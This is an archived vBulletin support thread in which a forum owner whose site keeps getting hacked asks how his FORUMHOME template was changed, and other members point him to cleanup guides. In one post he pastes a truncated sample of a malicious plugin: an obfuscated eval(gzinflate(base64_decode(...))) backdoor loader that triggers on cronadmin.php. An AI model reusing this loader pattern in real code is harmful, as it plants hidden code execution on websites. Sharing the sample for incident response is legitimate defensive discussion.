Go Back   vb.org Archive > vBulletin 4 Discussion > vB4 General Discussions
Reload this Page Hacker has changed my FORUMHOME template - how?
FAQ Community Calendar Today's Posts Search

Reply
Page 1 of 2 1 2
 
Thread Tools Display Modes
  #1  
Old 10-13-2013, 01:06 AM
VBUsers's Avatar
VBUsers VBUsers is offline
 
Join Date: Aug 2004
Posts: 830
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default Hacker has changed my FORUMHOME template - how?
How has a hacker been able to change my forum home template to point to his forum? I reverted the template and fixed the issue but I don't know how he got in or what to change to stop him from doing this. Please help

hydrocanna.com
Reply With Quote
  #2  
Old 10-13-2013, 01:10 AM
ozzy47's Avatar
ozzy47 ozzy47 is offline
 
Join Date: Jul 2009
Location: USA
Posts: 10,929
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
You sure you cleaned out your site completely after you reported being hacked on Oct 4th?
Reply With Quote
  #3  
Old 10-13-2013, 01:15 AM
VBUsers's Avatar
VBUsers VBUsers is offline
 
Join Date: Aug 2004
Posts: 830
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
i removed all the plugins that I felt were out of date

I removed the install folder after upgrading to 4.2.2

I changed all admin pw and cpanel pw

what am i missing?
Reply With Quote
  #4  
Old 10-13-2013, 01:20 AM
ozzy47's Avatar
ozzy47 ozzy47 is offline
 
Join Date: Jul 2009
Location: USA
Posts: 10,929
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
Did you follow all the items in the following links thoroughly?

http://www.vbulletin.com/forum/blogs...ve-been-hacked

http://www.vbulletin.com/forum/blogs...vbulletin-site
Reply With Quote
  #5  
Old 10-13-2013, 01:51 AM
VBUsers's Avatar
VBUsers VBUsers is offline
 
Join Date: Aug 2004
Posts: 830
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
I have for the most part and I'm trying to go through the files that don't belong on my server but not sure if i should delete that many files. Its quite a bit a few of em. Do i need to look at my plugins next?

how was he able to change the forum home? are there that many entrances for him to use that we can't narrow it down ?

thank you so much for your help. Ive been battling this for months now. It has def killed my community
Reply With Quote
  #6  
Old 10-13-2013, 01:53 AM
Max Taxable's Avatar
Max Taxable Max Taxable is offline
 
Join Date: Feb 2011
Posts: 3,134
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
Quote:
Originally Posted by VBUsers View Post
I have for the most part and I'm trying to go through the files that don't belong on my server but not sure if i should delete that many files. Its quite a bit a few of em. Do i need to look at my plugins next?

how was he able to change the forum home? are there that many entrances for him to use that we can't narrow it down ?

thank you so much for your help. Ive been battling this for months now. It has def killed my community
It's not only "narrowed down" it is explained explicitly, at the links provided.
Reply With Quote
Благодарность от:
ozzy47
  #7  
Old 10-13-2013, 01:57 AM
ozzy47's Avatar
ozzy47 ozzy47 is offline
 
Join Date: Jul 2009
Location: USA
Posts: 10,929
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
Well I would follow everything in the guides, and then you should be good to go.

There is no way of knowing exactly how the forumhome was changed, but at least reverting is seems to have fixed it.

If you have not got any emails from vb.org about a potential exploit in any mods you are using, then you should be safe. You will only get the email if you have mods you are using, marked as installed.
Reply With Quote
  #8  
Old 10-13-2013, 02:05 AM
VBUsers's Avatar
VBUsers VBUsers is offline
 
Join Date: Aug 2004
Posts: 830
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
i found that the hacker got into the admincp and edited a plugin that has this code in it

Code:
if (strpos($_SERVER['PHP_SELF'],'cronadmin.php')) { 

eval(gzinflate(base64_decode('7X37d9s20ujP6Tn5HxCvt5K3tl6O28aJ3dryS45fsWQ7dpLjQ5GUxJgPlaQsK3v6/e13Bi+CT1FJ09373evdMiI4mBkMBoMBMADq9Z6pORdd0h2Ztv38h3p9d0Yu7IlDfiRv/dm4Z719/oPp+55/75tjzw8td1htrLx+/sM/9JFh+dVKBV/q9a7nmKSvBZZOHjW/Ejz/wRqQ6ovfl+8P93sfKmMtHFU+rZB/P/+BwN8yZCVbpG2bmrsHWIZmqE+N6gri+pOYdmDmQcbxIfjzH5Z9zwtTcN39y+v9yw+VvfP21en+We/+8vy8x/IsG56jWS7AR2BHvd7F/dF5F0AQItB9axzGILrty85F7/5s53SfwQwmtn0/8e0Y1OX+u6v9bu/+6rKjYmoBEIjHdDXHrPI0ykpg+o8mvMVJ0X/vd/b2LhmSSZCCudw/Pe/tKzDTkac5FsAMJq4eWp57bz5ZQRhUl8ZeYD3dg5DH04llLK2Q30g8qSpfTXxbWSGbxHwy9eoSQ7q0sjABDv2hgiWufMpEaFiB1rdNA1BaroX5qxWedi9oBFzBLkwQdF/TH4juua6ph4RXUX9GTjx/D2H2Xd0zAB1ULcr655dk4PkI/2i6lunqJtDs62PAdB94E183gfBSZ7b/aLw/m520jsd969X07v1x0NlpvIU0u7NvX5x/Hvf6rTP/7v27XzC9M9sZdg52Z9r725edtvdH5m8Kt3t89XBw3tkf7b5rhAdX9unwqnHQ7jUvdy8bV8N3rVeTvnP92Wjvtm9vzvzOwZl3d/MUdNqAX/zH8Hzuty7tzuHxxvnD06P+8G6498773DkwgL+D2V135+fe4avZZbu5d3r47otuNc+v203d3HuYxnAt9t9Z2zodXt40R9rNlOHf3x1rR2eNu5uD8MQ5e+x3GQzy0ofvd/u7vf7hwWdt3RjpzvWpdrPRNPe8R+3wVXjXfTXVnVeu7hyEkO4et3eZnA8vP5+4uwErZyO86DUiuewfj25bwfCdAzhbl4/99c7wqjWy+4fToeGeDk+7L6cok84+k0m/dTvsXh/v9qzdzrurs5PL6+MeyHT33cOrq3dXxkFnr/HqpNtgskN6zesvtzeGfW7tPtzONqb99m6/e/jqi3HQGN40dx9199Lg9Q3lPDuAsgzvDk8nOtA/7XXWTz7vTE7bL586e52n08/7f40c9vZnZ7OXU4q7uzMDOk//GdkEf7zv7nbv3kM9H92N+44+pLLZ3xj1b64o3M1sbHT24buzYd+uXyLM5MR6GZdNhKunHx6s9x17cjfb7WmH10Gf6thZ/62tlOvw+qFz
the plugin has a lot more code that i cant post in here. is this plugin the hack they keep getting in from? I deleted this a week ago. how is it back?
Reply With Quote
  #9  
Old 10-13-2013, 02:07 AM
VBUsers's Avatar
VBUsers VBUsers is offline
 
Join Date: Aug 2004
Posts: 830
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
here is the screen shot from the log. how does he not have a username?

I blocked the ip but im sure thats not a big deal
Attached Images
File Type: jpg hacker.jpg (117.9 KB, 0 views)
Reply With Quote
  #10  
Old 10-13-2013, 02:08 AM
CharlieDelta CharlieDelta is offline
 
Join Date: Apr 2010
Posts: 616
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
There is a hole somewhere. Could be a file hidden on your server. You need to thoroughly check every file and compare the dates, etc..
Make sure you follow the suggestions to a "T" that Ozzy linked.
Reply With Quote
Reply
Page 1 of 2 1 2

« Previous Thread | Next Thread »

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Forum Jump


All times are GMT. The time now is 02:27 AM.

Contact Us - Archive - Top

Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.
X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.04125 seconds
  • Memory Usage 2,282KB
  • Queries Executed 12 (?)
More Information
Template Usage:
  • (1)SHOWTHREAD
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)ad_showthread_beforeqr
  • (1)ad_showthread_firstpost
  • (1)ad_showthread_firstpost_sig
  • (1)ad_showthread_firstpost_start
  • (1)bbcode_code
  • (1)bbcode_quote
  • (1)footer
  • (1)forumjump
  • (1)forumrules
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (1)navbar
  • (3)navbar_link
  • (120)option
  • (1)pagenav
  • (1)pagenav_curpage
  • (1)pagenav_pagelink
  • (10)post_thanks_box
  • (1)post_thanks_box_bit
  • (10)post_thanks_button
  • (1)post_thanks_javascript
  • (1)post_thanks_navbar_search
  • (1)post_thanks_postbit
  • (10)post_thanks_postbit_info
  • (10)postbit
  • (1)postbit_attachment
  • (10)postbit_onlinestatus
  • (10)postbit_wrapper
  • (1)spacer_close
  • (1)spacer_open
  • (1)tagbit_wrapper 
Phrase Groups Available:
  • global
  • inlinemod
  • postbit
  • posting
  • reputationlevel
  • showthread
Included Files:
  • ./showthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/functions_bigthree.php
  • ./includes/class_postbit.php
  • ./includes/class_bbcode.php
  • ./includes/functions_reputation.php
  • ./includes/functions_post_thanks.php 
Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • showthread_start
  • showthread_getinfo
  • forumjump
  • showthread_post_start
  • showthread_query_postids
  • showthread_query
  • bbcode_fetch_tags
  • bbcode_create
  • showthread_postbit_create
  • postbit_factory
  • postbit_display_start
  • post_thanks_function_post_thanks_off_start
  • post_thanks_function_post_thanks_off_end
  • post_thanks_function_fetch_thanks_start
  • fetch_musername
  • post_thanks_function_fetch_thanks_end
  • post_thanks_function_thanked_already_start
  • post_thanks_function_thanked_already_end
  • postbit_imicons
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • postbit_display_complete
  • post_thanks_function_can_thank_this_post_start
  • post_thanks_function_fetch_thanks_bit_start
  • post_thanks_function_show_thanks_date_start
  • post_thanks_function_show_thanks_date_end
  • post_thanks_function_fetch_thanks_bit_end
  • post_thanks_function_fetch_post_thanks_template_start
  • post_thanks_function_fetch_post_thanks_template_end
  • postbit_attachment
  • pagenav_page
  • pagenav_complete
  • tag_fetchbit_complete
  • forumrules
  • navbits
  • navbits_complete
  • showthread_complete